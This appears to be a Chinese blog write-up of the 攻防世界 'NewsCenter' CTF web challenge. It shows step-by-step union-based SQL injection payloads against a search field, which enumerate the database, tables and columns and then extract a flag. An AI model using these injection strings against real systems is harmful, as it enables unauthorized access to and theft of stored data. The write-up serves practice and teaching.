攻防世界-Web-Newscenter

最新推荐文章于 2024-05-18 20:54:16 发布
最新推荐文章于 2024-05-18 20:54:16 发布
阅读量207 收藏
点赞数
分类专栏: WriteUp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/108039891
版权

0x01

打开题目看到一个网页,里面只有一个搜索输入框是我们可以控制的,所以猜测可能是SQL注入。尝试123asdqwe' or 1=1#发现能够查询出所有新闻。

继续尝试' union select 1,2,3#,验证select查询了三个字段:

在这里插入图片描述

0x02

已经可以判定是联合注入,接下来就简单了。

查询当前数据库

1' union select 1,2,database()#,得到数据库为news
在这里插入图片描述

查询当前库中的表

1' union select 1,table_name,3 from information_schema.tables where table_schema='news'#获得两个表名:news和secret_table

在这里插入图片描述

查询表中的列

猜测flag极有可能在secret_table里面,下面就查询其中的列名:
1' union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#得到列名有fl4g
在这里插入图片描述

查询flag列的值

1' union select 1,fl4g,3 from secret_table#获取flag
在这里插入图片描述

备注

该题是POST类型的注入。当我在测试SQL注入漏洞时使用了常用的1' and '1'='1发现并不能验证漏洞。这里我猜测可能是题目中使用了like来限定条件而不是等号。
如果输入是1,那么后端拼接完成的语句可能是like '%1%',这样就会找出含有1的内容,而我输入1' and '1'='1就会被拼接成like '%1' and '1'='1%1'显然是不成立搜不出任何东西。然而用or就可以验证。

uh3ng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web-News-开源
04-22
Web-News是一个用PHP 4.0编写的基于Web的新闻组客户端。 它用于通过网络浏览器或RSS客户端轻松访问任何NNTP服务器。 它完全支持MIME或UUEncoded消息以及普通新闻组客户端以HTML格式发布的消息。
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1814
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 378
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界-web-newscenter
wuh2333的博客
05-30 1079
攻防世界,sql注入
攻防世界NewsCenter
qq_45955869的博客
05-19 531
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界 web进阶区 NewsCenter
m0_51395584的博客
06-17 827
攻防世界 web进阶区 NewsCenter 简单的SQL联合查询注入
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
《PyPI官网下载 | newscenter-2.0.4.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python...
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
newscenter_app
02-20
使用异步Web抓取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标题将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
NewsCenter
06-23
ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。在ASP中,开发者可以使用VBScript或JScript编写脚本,服务器端执行这些脚本并返回HTML到客户端浏览器。在【新闻中心...
WebNews
03-16
软件描述: WebNews是一个自动帮助你更新你的主页上的及时性信息的工具软件,它从更新频率较高的网站截取最新的信息,生成可以直接嵌入到自己的网页中的 JS 文件,只需在网页的适合的地方放至类似<;script language=javascript src=";xxxxxx.JS";>;<;/script>;的语句你的网页就可以时时有更新的内容了,特别适合中小网站个人网站等没有采编能力的网站使用,以吸引更多的人来访问。 新版本的新功能: 1.支持更多的新闻网站链接的截取,除继续提供1.0版支持的新浪滚动新闻外、增加了搜狐快乐人生、中国新闻网滚动新闻、新华网新闻、人民日报网站滚动新闻的截取。新的软件内核支持几乎所有流行的网站连接的截取,有特殊要求的用户可以直接和作者联系,把你喜欢的网站告诉我。 2.改变了运行方式,支持服务器和客户端两种平台运行。1.0版因为只能运行于服务器端才支持实时更新,所以很多个人网站、虚拟主机用户由于在服务器上没有执行可执行程序的权限,而无法使用WebNews。新版的WebNews可以运行于客户端还是服务器端,运行于服务器端的情况与1.0版类似; 运行于客户端时,软件增加了FTP自动上载支持,本地产生的更新文件可实时传递到你的主页空间,从而实现网站的实时更新。
攻防世界NewsCenter
金 帛的博客
04-09 2375
攻防世界WP
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1182
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
CTF-WEB攻防世界题目实战解析NewsCenter
2301_76565920的博客
04-29 253
题目:NewsCenter 难度:2。sql注入,union的使用
攻防世界-WEB-NewsCenter
Lucifer的专栏
09-07 345
有查询,猜测是sql注入。准备利用sqlmap。
JavaWeb-News-分页
起舞的日子
10-14 762
话说:分页
web新闻网站制作
Zluminous的博客
07-21 1936
web网页制作
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值